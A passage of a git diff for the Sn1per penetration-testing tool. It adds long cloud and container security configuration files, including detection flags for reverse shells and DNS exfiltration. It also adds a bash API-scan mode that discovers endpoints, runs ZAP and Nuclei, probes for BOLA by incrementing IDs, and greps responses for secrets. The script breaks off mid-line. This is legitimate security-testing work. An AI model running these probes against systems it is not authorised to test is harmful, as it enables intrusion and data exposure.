+AZURE_CLIENT_SECRET="" +AZURE_TENANT_ID="" +AZURE_SUBSCRIPTION_ID="" +AZURE_REGIONS="eastus,eastus2,westus,westus2,centralus,northcentralus,southcentralus,northeurope,westeurope" + +# Google Cloud Configuration +GOOGLE_APPLICATION_CREDENTIALS="" +GOOGLE_CLOUD_PROJECT="" +GOOGLE_CLOUD_REGIONS="us-central1,us-east1,us-east4,us-west1,us-west2,us-west3,us-west4,northamerica-northeast1,southamerica-east1,europe-north1,europe-west1,europe-west2,europe-west3,europe-west4,europe-west6,asia-east1,asia-east2,asia-northeast1,asia-northeast2,asia-northeast3,asia-south1,asia-southeast1,asia-southeast2,australia-southeast1" + +# Cloud Security Scanning Options +SCAN_CLOUD_STORAGE="1" +SCAN_CLOUD_COMPUTE="1" +SCAN_CLOUD_NETWORKING="1" +SCAN_CLOUD_IAM="1" +SCAN_CLOUD_DATABASES="1" +SCAN_CLOUD_LOGGING="1" +SCAN_CLOUD_SECURITY_SERVICES="1" + +# Cloud Storage Scanning Options +SCAN_STORAGE_PUBLIC_ACCESS="1" +SCAN_STORAGE_ENCRYPTION="1" +SCAN_STORAGE_LOGGING="1" +SCAN_STORAGE_VERSIONING="1" +SCAN_STORAGE_ACCESS_CONTROL="1" + +# Compute Scanning Options +SCAN_COMPUTE_VULNERABILITIES="1" +SCAN_COMPUTE_CONFIGURATION="1" +SCAN_COMPUTE_SECURITY_GROUPS="1" +SCAN_COMPUTE_METADATA="1" +SCAN_COMPUTE_IMAGES="1" + +# Networking Scanning Options +SCAN_NETWORK_ACLS="1" +SCAN_LOAD_BALANCERS="1" +SCAN_CDN_CONFIGURATION="1" +SCAN_DNS_CONFIGURATION="1" +SCAN_VPC_CONFIGURATION="1" + +# IAM Scanning Options +SCAN_IAM_POLICIES="1" +SCAN_IAM_ROLES="1" +SCAN_IAM_USERS="1" +SCAN_IAM_GROUPS="1" +SCAN_IAM_KEYS="1" +SCAN_IAM_PASSWORD_POLICY="1" +SCAN_IAM_MFA="1" + +# Database Scanning Options +SCAN_DATABASE_PUBLIC_ACCESS="1" +SCAN_DATABASE_ENCRYPTION="1" +SCAN_DATABASE_BACKUPS="1" +SCAN_DATABASE_PATCHES="1" + +# Logging and Monitoring Options +SCAN_CLOUDTRAIL_LOGS="1" +SCAN_CLOUDWATCH_LOGS="1" +SCAN_STACKDRIVER_LOGS="1" +SCAN_MONITORING_ALERTS="1" +SCAN_CONFIG_RULES="1" + +# Security Services Options +SCAN_WAF_CONFIGURATION="1" +SCAN_SHIELD_CONFIGURATION="1" +SCAN_GUARDDUTY_FINDINGS="1" +SCAN_SECURITY_HUB_FINDINGS="1" +SCAN_INSPECTOR_FINDINGS="1" + +# Cloud Security Tools +USE_CLOUDFLARE_SCAN="1" +USE_CLOUDFLARE_IP_RANGES="1" +USE_AWS_INSPECTOR="1" +USE_AWS_TRUSTED_ADVISOR="1" +USE_AZURE_SECURITY_CENTER="1" +USE_GCP_SECURITY_COMMAND_CENTER="1" + +# Cloud Security Scanners +USE_CLOUDFLAIR="1" +USE_CLOUDFRONT_ENUM="1" +USE_S3SCANNER="1" +USE_CLOUDFAIL="1" +USE_CLOUDGUARDIAN="1" + +# Rate Limiting and Throttling +CLOUD_API_RATE_LIMIT="100" # Requests per second +CLOUD_API_RETRY_ATTEMPTS="3" +CLOUD_API_TIMEOUT="30" # seconds + +# Output and Reporting +CLOUD_REPORT_FORMAT="html" # Options: html, json, csv, xml +CLOUD_REPORT_DETAIL_LEVEL="detailed" # Options: quick, standard, detailed +CLOUD_REPORT_OUTPUT_DIR="$LOOT_DIR/cloud" + +# Notification Settings +CLOUD_ALERT_CRITICAL="1" +CLOUD_ALERT_HIGH="1" +CLOUD_ALERT_MEDIUM="1" +CLOUD_ALERT_LOW="0" +CLOUD_ALERT_INFO="0" + +# Cloud Provider Specific Settings +## AWS Specific +AWS_SCAN_ORGANIZATIONS="1" +AWS_SCAN_SERVICE_LIMITS="1" +AWS_SCAN_TRUSTED_ADVISOR="1" +AWS_SCAN_INSPECTOR_FINDINGS="1" +AWS_SCAN_GUARDDUTY_FINDINGS="1" +AWS_SCAN_MACIE_FINDINGS="1" +AWS_SCAN_SECURITY_HUB_FINDINGS="1" + +## Azure Specific +AZURE_SCAN_SECURITY_CENTER="1" +AZURE_SCAN_POLICY_COMPLIANCE="1" +AZURE_SCAN_ADVISOR_RECOMMENDATIONS="1" + +## GCP Specific +GCP_SCAN_SECURITY_COMMAND_CENTER="1" +GCP_SCAN_ORG_POLICIES="1" +GCP_SCAN_ACTIVITY_LOGS="1" + +# Cloud Security Posture Management (CSPM) +ENABLE_CSPM_SCAN="1" +CSPM_PROVIDER="" # Options: aws, azure, gcp, all +CSPM_FRAMEWORKS="cis,csc,iso27001,hipaa,gdpr" + +# Cloud Workload Protection (CWP) +ENABLE_CWP_SCAN="1" +CWP_SCAN_CONTAINERS="1" +CWP_SCAN_SERVERLESS="1" +CWP_SCAN_VM="1" + +# Cloud Security Posture Rules +ENABLE_CSPM_RULES="1" +CSPM_RULES_PATH="$INSTALL_DIR/conf/cspm-rules" + +# Cloud Security Exclusions +CLOUD_EXCLUDE_RESOURCES="" # Comma-separated list of resource ARNs to exclude +CLOUD_EXCLUDE_REGIONS="" # Comma-separated list of regions to exclude +CLOUD_EXCLUDE_SERVICES="" # Comma-separated list of services to exclude + +# Cloud Security Benchmarking +ENABLE_CLOUD_BENCHMARK="1" +CLOUD_BENCHMARK_TOOL="" # Options: prowler, scoutsuite, cloud-custodian +CLOUD_BENCHMARK_PROFILES="cis,csc" + +# Cloud Security Scanning Tools +CLOUD_SCANNER_TOOL="" # Options: nuclei, nuclei-templates, cloud-sniper, pacu +CLOUD_SCANNER_TEMPLATES="$INSTALL_DIR/cloud-templates" + +# Cloud Security Scanning Options +CLOUD_SCAN_DEPTH="standard" # Options: quick, standard, deep +CLOUD_SCAN_THREADS="10" +CLOUD_SCAN_TIMEOUT="3600" # seconds + +# Cloud Security Output Options +CLOUD_OUTPUT_VERBOSE="0" +CLOUD_OUTPUT_DEBUG="0" +CLOUD_OUTPUT_QUIET="0" + +# Cloud Security API Options +CLOUD_API_CACHE_ENABLED="1" +CLOUD_API_CACHE_TTL="3600" # seconds +CLOUD_API_CACHE_DIR="$HOME/.sniper/cloud-cache" + +# Cloud Security Compliance Options +CLOUD_COMPLIANCE_STANDARDS="cis,pcidss,gdpr,hipaa,nist" +CLOUD_COMPLIANCE_REPORT="1" + +# Cloud Security Remediation Options +CLOUD_AUTO_REMEDIATE="0" +CLOUD_REMEDIATION_DRY_RUN="1" + +# Cloud Security Integration Options +INTEGRATE_ASFF="1" # AWS Security Finding Format +INTEGRATE_SECURITY_HUB="1" +INTEGRATE_SLACK="0" +INTEGRATE_JIRA="0" +INTEGRATE_PAGERDUTY="0" + +# Cloud Security Notification Options +NOTIFY_ON_CRITICAL="1" +NOTIFY_ON_HIGH="1" +NOTIFY_ON_MEDIUM="0" +NOTIFY_ON_LOW="0" +NOTIFY_ON_INFO="0" + +# Cloud Security Schedule Options +SCHEDULE_SCAN_DAILY="0" +SCHEDULE_SCAN_WEEKLY="0" +SCHEDULE_SCAN_MONTHLY="1" +SCHEDULE_SCAN_CRON="0 0 1 * *" # First day of every month at midnight + +# Cloud Security Advanced Options +CLOUD_ADVANCED_SCAN="0" +CLOUD_AGGRESSIVE_SCAN="0" +CLOUD_PASSIVE_SCAN="1" +CLOUD_ACTIVE_SCAN="0" + +# Cloud Security API Throttling +CLOUD_API_THROTTLE="100" # milliseconds between API calls +CLOUD_API_MAX_RETRIES="3" +CLOUD_API_RETRY_DELAY="5" # seconds + +# Cloud Security Data Collection +COLLECT_CLOUD_METADATA="1" +COLLECT_CLOUD_LOGS="1" +COLLECT_CLOUD_METRICS="1" +COLLECT_CLOUD_EVENTS="1" + +# Cloud Security Data Retention +RETAIN_CLOUD_DATA_DAYS="90" +COMPRESS_CLOUD_DATA="1" +ENCRYPT_CLOUD_DATA="1" + +# Cloud Security Advanced Scanning +ENABLE_CLOUD_PENETRATION_TESTING="0" +ENABLE_CLOUD_RED_TEAMING="0" +ENABLE_CLOUD_BLUE_TEAMING="1" +ENABLE_CLOUD_PURPLE_TEAMING="0" + +# Cloud Security Automation +ENABLE_CLOUD_AUTOMATION="1" +AUTOMATION_PROVIDER="" # Options: aws-step-functions, azure-logic-apps, gcp-workflows +AUTOMATION_TRIGGER="" # Options: schedule, event, manual +AUTOMATION_SCHEDULE="rate(1 day)" # Default schedule for automation + +# Cloud Security Customization +CUSTOM_CHECKS_ENABLED="1" +CUSTOM_CHECKS_DIR="$INSTALL_DIR/conf/cloud-checks" +CUSTOM_RULES_ENABLED="1" +CUSTOM_RULES_DIR="$INSTALL_DIR/conf/cloud-rules" + +# Cloud Security API Security +SCAN_API_GATEWAYS="1" +SCAN_API_ENDPOINTS="1" +SCAN_API_DOCUMENTATION="1" +SCAN_API_AUTHENTICATION="1" +SCAN_API_RATE_LIMITING="1" + +# Cloud Security Container Security +SCAN_CONTAINER_REGISTRIES="1" +SCAN_CONTAINER_IMAGES="1" +SCAN_CONTAINER_ORCHESTRATION="1" +SCAN_CONTAINER_RUNTIME="1" + +# Cloud Security Serverless Security +SCAN_SERVERLESS_FUNCTIONS="1" +SCAN_SERVERLESS_CONFIGURATION="1" +SCAN_SERVERLESS_DEPENDENCIES="1" + +# Cloud Security Data Protection +SCAN_DATA_CLASSIFICATION="1" +SCAN_DATA_ENCRYPTION="1" +SCAN_DATA_RETENTION="1" + +# Cloud Security Identity and Access +SCAN_IDENTITY_FEDERATION="1" +SCAN_ACCESS_ANALYTICS="1" +SCAN_PRIVILEGED_ACCESS="1" + +# Cloud Security Network Security +SCAN_NETWORK_TOPOLOGY="1" +SCAN_NETWORK_TRAFFIC="1" +SCAN_NETWORK_ACLS="1" + +# Cloud Security Logging and Monitoring +SCAN_LOGGING_CONFIGURATION="1" +SCAN_MONITORING_CONFIGURATION="1" +SCAN_ALERTING_CONFIGURATION="1" + +# Cloud Security Compliance +SCAN_COMPLIANCE_FRAMEWORKS="1" +GENERATE_COMPLIANCE_REPORTS="1" +AUTOMATE_COMPLIANCE_CHECKS="1" + +# Cloud Security Threat Detection +ENABLE_THREAT_DETECTION="1" +THREAT_INTELLIGENCE_FEEDS="1" +BEHAVIORAL_ANALYTICS="1" +ANOMALY_DETECTION="1" + +# Cloud Security Incident Response +INCIDENT_RESPONSE_PLAN="1" +AUTOMATED_INCIDENT_RESPONSE="1" +FORENSICS_COLLECTION="1" + +# Cloud Security Training and Awareness +SECURITY_AWARENESS_TRAINING="1" +PHISHING_SIMULATION="1" +SECURITY_CERTIFICATION="1" + +# Cloud Security Governance +SECURITY_GOVERNANCE_FRAMEWORK="1" +RISK_MANAGEMENT="1" +SECURITY_METRICS_AND_REPORTING="1" + +# Cloud Security Continuous Improvement +CONTINUOUS_IMPROVEMENT_PROGRAM="1" +SECURITY_MATURITY_ASSESSMENT="1" +BENCHMARKING_AND_METRICS="1" diff --git a/conf/container_security b/conf/container_security new file mode 100644 index 00000000..a234e58b --- /dev/null +++ b/conf/container_security @@ -0,0 +1,338 @@ +# Container Security Configuration for Sn1per +# This configuration optimizes Sn1per for container security assessment + +# General Settings +CONTAINER_RUNTIME="docker" # Options: docker, containerd, crio, podman +SCAN_RUNNING_CONTAINERS="1" +SCAN_STOPPED_CONTAINERS="1" +SCAN_CONTAINER_IMAGES="1" +SCAN_CONTAINER_REGISTRIES="1" +SCAN_CONTAINER_ORCHESTRATORS="1" + +# Docker Configuration +DOCKER_SOCKET="/var/run/docker.sock" +DOCKER_TLS_ENABLED="0" +DOCKER_TLS_VERIFY="0" +DOCKER_CERT_PATH="$HOME/.docker/" + +# Kubernetes Configuration +KUBECONFIG="$HOME/.kube/config" +SCAN_KUBERNETES_CLUSTER="1" +SCAN_KUBERNETES_NAMESPACES="all" # Comma-separated list or 'all' +SCAN_KUBERNETES_PODS="1" +SCAN_KUBERNETES_DEPLOYMENTS="1" +SCAN_KUBERNETES_SERVICES="1" +SCAN_KUBERNETES_INGRESS="1" +SCAN_KUBERNETES_NETWORK_POLICIES="1" +SCAN_KUBERNETES_RBAC="1" +SCAN_KUBERNETES_PSP="1" +SCAN_KUBERNETES_CRDS="1" + +# Container Registry Configuration +REGISTRY_URL="" +REGISTRY_USERNAME="" +REGISTRY_PASSWORD="" +REGISTRY_INSECURE="0" +SCAN_REGISTRY_IMAGES="1" +SCAN_REGISTRY_TAGS="latest" # Comma-separated list or 'all' + +# Container Security Scanning Tools +USE_TRIVY="1" +TRIVY_SEVERITY="CRITICAL,HIGH,MEDIUM" +TRIVY_IGNORE_UNFIXED="1" +TRIVY_VULN_TYPE="os,library" +TRIVY_SECURITY_CHECKS="vuln,config,secret" + +USE_DOCKLE="1" +DOCKLE_IGNORE_CHECKS="" +DOCKLE_ACCEPT_KEYS="" + +USE_CLAIRE="1" +USE_ANCHORE="0" +USE_CLAIR="1" +USE_GRYPE="1" + +# Container Vulnerability Scanning +SCAN_VULNERABILITIES="1" +SCAN_MISCONFIGURATIONS="1" +SCAN_SECRETS="1" +SCAN_DEPENDENCIES="1" +SCAN_OS_PACKAGES="1" +SCAN_LANGUAGE_PACKAGES="1" +SCAN_ROOTFS="1" + +# Container Runtime Security +MONITOR_CONTAINER_RUNTIME="1" +DETECT_PRIVILEGED_CONTAINERS="1" +DETECT_ROOT_CONTAINERS="1" +DETECT_EXPOSED_DOCKER_SOCKET="1" +DETECT_SENSITIVE_MOUNTS="1" +DETECT_SENSITIVE_ENV_VARS="1" + +# Container Network Security +SCAN_CONTAINER_NETWORK="1" +DETECT_EXPOSED_PORTS="1" +DETECT_NETWORK_POLICIES="1" +DETECT_NETWORK_ISOLATION="1" + +# Container Storage Security +SCAN_VOLUMES="1" +DETECT_SENSITIVE_VOLUMES="1" +DETECT_READ_ONLY_FILESYSTEM="1" +DETECT_TMPFS_MOUNTS="1" + +# Container Image Security +SCAN_IMAGE_HISTORY="1" +SCAN_IMAGE_LAYERS="1" +DETECT_CLEAR_TEXT_CREDENTIALS="1" +DETECT_HARDCODED_SECRETS="1" +DETECT_EXPOSED_CREDENTIALS="1" + +# Container Compliance +CHECK_CIS_BENCHMARK="1" +CHECK_NIST_BENCHMARK="1" +CHECK_DISA_STIG="1" +CHECK_ISO27001="1" +CHECK_HIPAA="1" +CHECK_PCI_DSS="1" +CHECK_GDPR="1" + +# Kubernetes Security +SCAN_KUBERNETES_API="1" +SCAN_KUBERNETES_ETCD="1" +SCAN_KUBERNETES_DASHBOARD="1" +SCAN_KUBERNETES_DNS="1" +SCAN_KUBERNETES_PROXY="1" +SCAN_KUBERNETES_SCHEDULER="1" +SCAN_KUBERNETES_CONTROLLER="1" +SCAN_KUBERNETES_WORKERS="1" + +# Kubernetes Workload Security +SCAN_KUBERNETES_POD_SECURITY_CONTEXT="1" +SCAN_KUBERNETES_CONTAINER_SECURITY_CONTEXT="1" +SCAN_KUBERNETES_SERVICE_ACCOUNTS="1" +SCAN_KUBERNETES_NETWORK_POLICIES="1" +SCAN_KUBERNETES_INGRESS="1" +SCAN_KUBERNETES_STORAGE="1" + +# Kubernetes API Security +SCAN_KUBERNETES_API_AUTHENTICATION="1" +SCAN_KUBERNETES_API_AUTHORIZATION="1" +SCAN_KUBERNETES_API_ADMISSION_CONTROLLERS="1" +SCAN_KUBERNETES_API_AUDIT_LOGGING="1" + +# Kubernetes Network Security +SCAN_KUBERNETES_NETWORK_POLICIES="1" +SCAN_KUBERNETES_NETWORK_ISOLATION="1" +SCAN_KUBERNETES_NETWORK_PLUGIN="1" +SCAN_KUBERNETES_EGRESS_CONTROL="1" + +# Kubernetes Storage Security +SCAN_KUBERNETES_VOLUMES="1" +SCAN_KUBERNETES_SECRETS="1" +SCAN_KUBERNETES_CONFIGMAPS="1" +SCAN_KUBERNETES_PERSISTENT_VOLUMES="1" + +# Kubernetes Monitoring and Logging +SCAN_KUBERNETES_LOGGING="1" +SCAN_KUBERNETES_MONITORING="1" +SCAN_KUBERNETES_AUDIT_LOGS="1" +SCAN_KUBERNETES_EVENTS="1" + +# Kubernetes Compliance +SCAN_KUBERNETES_CIS_BENCHMARK="1" +SCAN_KUBERNETES_NIST_BENCHMARK="1" +SCAN_KUBERNETES_DISA_STIG="1" +SCAN_KUBERNETES_ISO27001="1" +SCAN_KUBERNETES_HIPAA="1" +SCAN_KUBERNETES_PCI_DSS="1" +SCAN_KUBERNETES_GDPR="1" + +# Container Registry Security +SCAN_REGISTRY_AUTHENTICATION="1" +SCAN_REGISTRY_AUTHORIZATION="1" +SCAN_REGISTRY_IMAGE_SIGNING="1" +SCAN_REGISTRY_IMAGE_SCANNING="1" +SCAN_REGISTRY_IMAGE_ACCESS_CONTROL="1" + +# Container Build Security +SCAN_DOCKERFILE="1" +SCAN_DOCKER_COMPOSE="1" +SCAN_KUBERNETES_MANIFESTS="1" +SCAN_HELM_CHARTS="1" +SCAN_KUSTOMIZE="1" + +# Container Runtime Security +MONITOR_CONTAINER_RUNTIME="1" +DETECT_CONTAINER_ESCAPE="1" +DETECT_PRIVILEGE_ESCALATION="1" +DETECT_SHELL_ACCESS="1" +DETECT_REVERSE_SHELLS="1" +DETECT_CRYPTOMINERS="1" +DETECT_MALWARE="1" + +# Container Network Security +MONITOR_CONTAINER_NETWORK="1" +DETECT_NETWORK_ANOMALIES="1" +DETECT_DNS_EXFILTRATION="1" +DETECT_DNS_TUNNELING="1" +DETECT_PORT_SCANNING="1" +DETECT_BRUTE_FORCE_ATTEMPTS="1" + +# Container File System Security +MONITOR_FILE_SYSTEM="1" +DETECT_FILE_CHANGES="1" +DETECT_SENSITIVE_FILES="1" +DETECT_UNAUTHORIZED_MOUNTS="1" +DETECT_UNAUTHORIZED_VOLUMES="1" + +# Container Process Security +MONITOR_PROCESSES="1" +DETECT_NEW_PROCESSES="1" +DETECT_PRIVILEGED_PROCESSES="1" +DETECT_SUSPICIOUS_PROCESSES="1" +DETECT_CRYPTOMINING_PROCESSES="1" + +# Container User Security +MONITOR_USERS_AND_GROUPS="1" +DETECT_NEW_USERS="1" +DETECT_PRIVILEGED_USERS="1" +DETECT_SUDO_ACCESS="1" +DETECT_SUID_SGID_FILES="1" + +# Container Logging and Monitoring +ENABLE_CONTAINER_LOGGING="1" +ENABLE_CONTAINER_METRICS="1" +ENABLE_CONTAINER_TRACING="1" +ENABLE_CONTAINER_AUDITING="1" + +# Container Incident Response +ENABLE_INCIDENT_RESPONSE="1" +AUTOMATED_INCIDENT_RESPONSE="1" +FORENSIC_COLLECTION="1" +CONTAINER_FORENSICS="1" +MEMORY_FORENSICS="1" + +# Container Security Tools +USE_FALCO="1" +USE_AQUA="0" +USE_AQUA_ENTERPRISE="0" +USE_PRISMA_CLOUD="0" +USE_SYS_DIG="1" +USE_OSQUERY="1" +USE_CILIUM="1" +USE_CALICO="1" + +# Container Security Posture Management +ENABLE_CSPM="1" +CSPM_PROVIDER="" # Options: aws, azure, gcp, on-prem +CSPM_FRAMEWORKS="cis, nist, pci" + +# Container Vulnerability Management +ENABLE_VULNERABILITY_MANAGEMENT="1" +VULNERABILITY_SCAN_SCHEDULE="0 0 * * *" # Daily at midnight +VULNERABILITY_SCAN_THRESHOLD="high" +VULNERABILITY_SCAN_REPORT_FORMAT="html" + +# Container Image Signing and Verification +ENABLE_IMAGE_SIGNING="1" +ENABLE_IMAGE_VERIFICATION="1" +SIGNING_KEY_PATH="" +VERIFICATION_KEY_PATH="" + +# Container Runtime Protection +ENABLE_RUNTIME_PROTECTION="1" +RUNTIME_PROTECTION_ENGINE="" # Options: falco, aqua, prisma, sysdig +RUNTIME_PROTECTION_RULES="$INSTALL_DIR/conf/container-rules" + +# Container Network Security +ENABLE_NETWORK_POLICIES="1" +ENABLE_NETWORK_ISOLATION="1" +ENABLE_EGRESS_CONTROL="1" +ENABLE_INGRESS_CONTROL="1" + +# Container Secrets Management +ENABLE_SECRETS_MANAGEMENT="1" +SECRETS_MANAGEMENT_PROVIDER="" # Options: hashicorp-vault, aws-secrets-manager, azure-key-vault, gcp-secret-manager +SECRETS_MANAGEMENT_INTEGRATION="1" + +# Container Compliance and Governance +ENABLE_COMPLIANCE_MONITORING="1" +COMPLIANCE_STANDARDS="cis, nist, pci, gdpr, hipaa" +AUTOMATED_REMEDIATION="1" + +# Container Security Reporting +REPORT_FORMAT="html" # Options: html, json, pdf, csv +REPORT_OUTPUT_DIR="$LOOT_DIR/container-security" +REPORT_RETENTION_DAYS="90" + +# Container Security Notifications +ENABLE_EMAIL_NOTIFICATIONS="0" +EMAIL_RECIPIENTS="" +ENABLE_SLACK_NOTIFICATIONS="0" +SLACK_WEBHOOK_URL="" +ENABLE_WEBHOOK_NOTIFICATIONS="0" +WEBHOOK_URL="" + +# Container Security API +ENABLE_API="1" +API_PORT="8080" +API_AUTHENTICATION="1" +API_AUTHENTICATION_TOKEN="" + +# Container Security Advanced Options +DEBUG_MODE="0" +VERBOSE_OUTPUT="0" +ENABLE_PERFORMANCE_MONITORING="1" +ENABLE_RESOURCE_OPTIMIZATION="1" + +# Container Security Customization +CUSTOM_CHECKS_ENABLED="1" +CUSTOM_CHECKS_DIR="$INSTALL_DIR/conf/container-checks" +CUSTOM_RULES_ENABLED="1" +CUSTOM_RULES_DIR="$INSTALL_DIR/conf/container-rules" + +# Container Security Continuous Integration/Continuous Deployment (CI/CD) +ENABLE_CI_CD_INTEGRATION="1" +CI_CD_PROVIDER="" # Options: jenkins, gitlab, github, bitbucket, azure-devops +CI_CD_CONFIG_FILE="" + +# Container Security Orchestration +ENABLE_ORCHESTRATION="1" +ORCHESTRATION_PROVIDER="" # Options: kubernetes, docker-swarm, nomad, mesos +ORCHESTRATION_CONFIG_FILE="" + +# Container Security Machine Learning +ENABLE_ML_ANALYSIS="1" +ML_MODEL_PATH="$INSTALL_DIR/ml-models/container-security" +ML_THRESHOLD="0.8" + +# Container Security Threat Intelligence +ENABLE_THREAT_INTELLIGENCE="1" +THREAT_INTELLIGENCE_FEEDS="" # Comma-separated list of threat intelligence feed URLs +THREAT_INTELLIGENCE_UPDATE_FREQUENCY="24h" + +# Container Security Automation +ENABLE_AUTOMATION="1" +AUTOMATION_PROVIDER="" # Options: ansible, terraform, puppet, chef +AUTOMATION_PLAYBOOK_PATH="" + +# Container Security Backup and Recovery +ENABLE_BACKUP="1" +BACKUP_LOCATION="" # Local path or cloud storage URL +BACKUP_RETENTION_DAYS="30" + +# Container Security Training and Awareness +ENABLE_TRAINING="1" +TRAINING_MODULES="" # Comma-separated list of training modules +TRAINING_FREQUENCY="30d" + +# Container Security Governance +ENABLE_GOVERNANCE="1" +GOVERNANCE_FRAMEWORK="" # Options: itil, cobit, iso27001, nist-csf +GOVERNANCE_POLICIES="" # Path to governance policies + +# Container Security Continuous Improvement +ENABLE_CONTINUOUS_IMPROVEMENT="1" +IMPROVEMENT_METRICS="" # Comma-separated list of metrics to track +IMPROVEMENT_GOALS="" # Comma-separated list of improvement goals diff --git a/modes/airstrike.sh b/modes/airstrike.sh old mode 100644 new mode 100755 diff --git a/modes/api-security-scan.sh b/modes/api-security-scan.sh new file mode 100644 index 00000000..31dc9161 --- /dev/null +++ b/modes/api-security-scan.sh @@ -0,0 +1,327 @@ +#!/bin/bash +# API Security Scan Mode +# Author: Sn1per Security Team +# Description: Comprehensive API security testing and assessment + +if [[ "$API_SECURITY_SCAN" = "1" ]]; then + echo "[sn1persecurity.com] •?((¯°·._.• Started API Security Scan: $TARGET [api-security-scan] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt + + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started API Security Scan: $TARGET [api-security-scan] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + + mkdir -p $LOOT_DIR/api/$TARGET + + # Check if the target is a URL + if [[ ! $TARGET =~ ^https?:// ]]; then + TARGET="http://$TARGET" + fi + + # API Discovery + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED DISCOVERING API ENDPOINTS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Use common API endpoints discovery + if command -v gau &> /dev/null; then + echo -e "${OKBLUE}[*]${RESET} Discovering API endpoints with gau..." + echo $TARGET | gau --subs --threads 10 | grep -iE "\.(json|xml|api|rest|soap|graphql|grpc|rpc)" | sort -u > $LOOT_DIR/api/$TARGET/endpoints-gau.txt + fi + + if command -v waybackurls &> /dev/null; then + echo -e "${OKBLUE}[*]${RESET} Discovering historical API endpoints with waybackurls..." + echo $TARGET | waybackurls | grep -iE "\.(json|xml|api|rest|soap|graphql|grpc|rpc)" | sort -u > $LOOT_DIR/api/$TARGET/endpoints-wayback.txt + fi + + # Combine and deduplicate endpoints + cat $LOOT_DIR/api/$TARGET/endpoints-*.txt 2>/dev/null | sort -u > $LOOT_DIR/api/$TARGET/endpoints-all.txt + + # API Documentation Discovery + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED SEARCHING FOR API DOCUMENTATION $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Common API documentation paths + DOC_PATHS=("/api/docs" "/swagger" "/swagger-ui" "/swagger-ui.html" "/api/swagger" "/api-docs" + "/api-docs/swagger.json" "/v1/api-docs" "/v2/api-docs" "/v3/api-docs" "/openapi" + "/openapi.json" "/openapi.yaml" "/openapi.yml" "/api/openapi.json" "/documentation") + + for path in "${DOC_PATHS[@]}"; do + url="${TARGET%/}$path" + echo -e "${OKBLUE}[*]${RESET} Checking: $url" + curl -s -k -L --connect-timeout 5 --max-time 10 -o /dev/null -w "%{http_code}" "$url" | grep -q "^[23]" && echo "[+] Found: $url" >> $LOOT_DIR/api/$TARGET/api-docs-found.txt + done + + # API Security Testing + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED PERFORMING API SECURITY TESTS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Run OWASP ZAP if available + if [[ "$ZAP_SCAN" = "1" ]] && command -v zap-cli &> /dev/null; then + echo -e "${OKBLUE}[*]${RESET} Running OWASP ZAP API scan..." + zap-cli start --start-options '-config api.disablekey=true' > /dev/null 2>&1 & + ZAP_PID=$! + sleep 10 + + zap-cli open-url "$TARGET" + zap-cli active-scan "$TARGET" + zap-cli report -o "$LOOT_DIR/api/$TARGET/zap-report.html" -f html + + kill $ZAP_PID + fi + + # Run Nuclei for API security checks + if command -v nuclei &> /dev/null; then + echo -e "${OKBLUE}[*]${RESET} Running Nuclei API security checks..." + nuclei -t "$NUCLEI_TEMPLATES_PATH/technologies/" -t "$NUCLEI_TEMPLATES_PATH/vulnerabilities/" -u "$TARGET" -o "$LOOT_DIR/api/$TARGET/nuclei-api-scan.txt" -silent + fi + + # Test for common API vulnerabilities + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED TESTING FOR COMMON API VULNERABILITIES $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Test for BOLA (Broken Object Level Authorization) + echo -e "${OKBLUE}[*]${RESET} Testing for BOLA (Broken Object Level Authorization)..." + if [ -s "$LOOT_DIR/api/$TARGET/endpoints-all.txt" ]; then + for endpoint in $(grep -E "/[0-9]+/" $LOOT_DIR/api/$TARGET/endpoints-all.txt | head -n 10); do + # Try to access another user's resource by ID manipulation + new_id=$(($(echo $endpoint | grep -oE '[0-9]+' | head -n 1) + 1)) + test_url=$(echo $endpoint | sed -E "s|/[0-9]+/|/$new_id/|g") + status_code=$(curl -s -k -o /dev/null -w "%{http_code}" -H "Authorization: Bearer $API_TOKEN" "$test_url") + + if [[ "$status_code" == "200" ]]; then + echo "[!] Possible BOLA vulnerability found: $test_url" >> "$LOOT_DIR/api/$TARGET/vulnerabilities-bola.txt" + fi + done + fi + + # Test for Excessive Data Exposure + echo -e "${OKBLUE}[*]${RESET} Testing for Excessive Data Exposure..." + if [ -s "$LOOT_DIR/api/$TARGET/endpoints-all.txt" ]; then + for endpoint in $(grep -E "\.(json|xml)" $LOOT_DIR/api/$TARGET/endpoints-all.txt | head -n 10); do + # Check if sensitive data is exposed in the response + response=$(curl -s -k -H "Authorization: Bearer $API_TOKEN" "$endpoint") + + if echo "$response" | grep -qE '(password|token|secret|key|auth|credential)'; then + echo "[!] Possible Excessive Data Exposure in: $endpoint" >> "$LOOT_DIR/api/$TARGET/vulnerabilities-data-exposure.txt" + echo " Exposed sensitive data: $(echo "$response" | grep -Eo '(password|token|secret|key|auth|credential)[^,\"\'\}]*' | head -n 3 | tr '\n' ',')" >> "$LOOT_DIR/api/$TARGET/vulnerabilities-data-exposure.txt" + fi + done + fi + + # Test for Security Misconfiguration + echo -e "${OKBLUE}[*]${RESET} Testing for Security Misconfigurations..." + # Check for missing security headers + curl -s -k -I "$TARGET" | grep -iE "(server|x-powered-by|x-aspnet-version|x-aspnetmvc-version)" > "$LOOT_DIR/api/$TARGET/security-headers.txt" + + # Check 